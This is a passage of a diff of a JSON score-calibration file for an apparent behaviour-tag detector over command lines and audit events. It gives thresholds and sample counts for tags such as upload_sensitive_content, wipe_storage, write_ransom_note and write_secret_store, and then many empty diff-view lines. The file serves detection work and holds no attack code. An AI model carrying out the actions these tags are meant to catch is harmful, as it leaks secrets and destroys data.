"tp_p50": 0.6081,
|
| 1812 |
-
"tp_samples": 948
|
| 1813 |
-
},
|
| 1814 |
-
"upload_named_content": {
|
| 1815 |
-
"threshold": 0.571,
|
| 1816 |
-
"tp_p50": 0.687,
|
| 1817 |
-
"tp_samples": 608
|
| 1818 |
-
},
|
| 1819 |
-
"upload_object_storage": {
|
| 1820 |
-
"threshold": 0.5927,
|
| 1821 |
-
"tp_p50": 0.6976,
|
| 1822 |
-
"tp_samples": 510
|
| 1823 |
-
},
|
| 1824 |
-
"upload_sensitive_content": {
|
| 1825 |
-
"threshold": 0.4861,
|
| 1826 |
-
"tp_p50": 0.6173,
|
| 1827 |
-
"tp_samples": 1424
|
| 1828 |
-
},
|
| 1829 |
-
"verify_artifact_integrity": {
|
| 1830 |
-
"threshold": 0.6114,
|
| 1831 |
-
"tp_p50": 0.738,
|
| 1832 |
-
"tp_samples": 624
|
| 1833 |
-
},
|
| 1834 |
-
"verify_auth_policy": {
|
| 1835 |
-
"threshold": 0.6804,
|
| 1836 |
-
"tp_p50": 0.7732,
|
| 1837 |
-
"tp_samples": 226
|
| 1838 |
-
},
|
| 1839 |
-
"wipe_storage": {
|
| 1840 |
-
"threshold": 0.6448,
|
| 1841 |
-
"tp_p50": 0.7406,
|
| 1842 |
-
"tp_samples": 114
|
| 1843 |
-
},
|
| 1844 |
-
"write_executable_content": {
|
| 1845 |
-
"threshold": 0.5265,
|
| 1846 |
-
"tp_p50": 0.6483,
|
| 1847 |
-
"tp_samples": 555
|
| 1848 |
-
},
|
| 1849 |
-
"write_kernel_module_content": {
|
| 1850 |
-
"threshold": 0.6192,
|
| 1851 |
-
"tp_p50": 0.7012,
|
| 1852 |
-
"tp_samples": 110
|
| 1853 |
-
},
|
| 1854 |
-
"write_ransom_note": {
|
| 1855 |
-
"threshold": 0.7066,
|
| 1856 |
-
"tp_p50": 0.7899,
|
| 1857 |
-
"tp_samples": 119
|
| 1858 |
-
},
|
| 1859 |
-
"write_secret_store": {
|
| 1860 |
-
"threshold": 0.6641,
|
| 1861 |
-
"tp_p50": 0.732,
|
| 1862 |
-
"tp_samples": 121
|
| 1863 |
-
},
|
| 1864 |
-
"write_shared_library_content": {
|
| 1865 |
-
"threshold": 0.6284,
|
| 1866 |
-
"tp_p50": 0.7173,
|
| 1867 |
-
"tp_samples": 133
|
| 1868 |
-
},
|
| 1869 |
-
"write_system_executable_content": {
|
| 1870 |
-
"threshold": 0.6197,
|
| 1871 |
-
"tp_p50": 0.7028,
|
| 1872 |
-
"tp_samples": 112
|
| 1873 |
-
},
|
| 1874 |
-
"write_web_script_content": {
|
| 1875 |
-
"threshold": 0.6228,
|
| 1876 |
-
"tp_p50": 0.7186,
|
| 1877 |
-
"tp_samples": 142
|
| 1878 |
-
}
|
| 1879 |
-
},
|
| 1880 |
-
"max_threshold": 0.95,
|
| 1881 |
-
"min_label_samples": 5,
|
| 1882 |
-
"model": "models/v4-tags-embedding/gte-modernbert-rev20-behavior-full-corpus/model",
|
| 1883 |
-
"percentile": 10.0,
|
| 1884 |
-
"prompt_profile": "mid",
|
| 1885 |
-
"prompt_profile_experimental": false,
|
| 1886 |
-
"query_prefix": "observed command line or audit event",
|
| 1887 |
-
"runtime_seconds": 36.743,
|
| 1888 |
-
"schema": "agentsmith_rev20_score_calibration_v1",
|
| 1889 |
-
"split": "train",
|
| 1890 |
-
"tag_prefix": "behavior tag definition"
|
| 1891 |
-
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|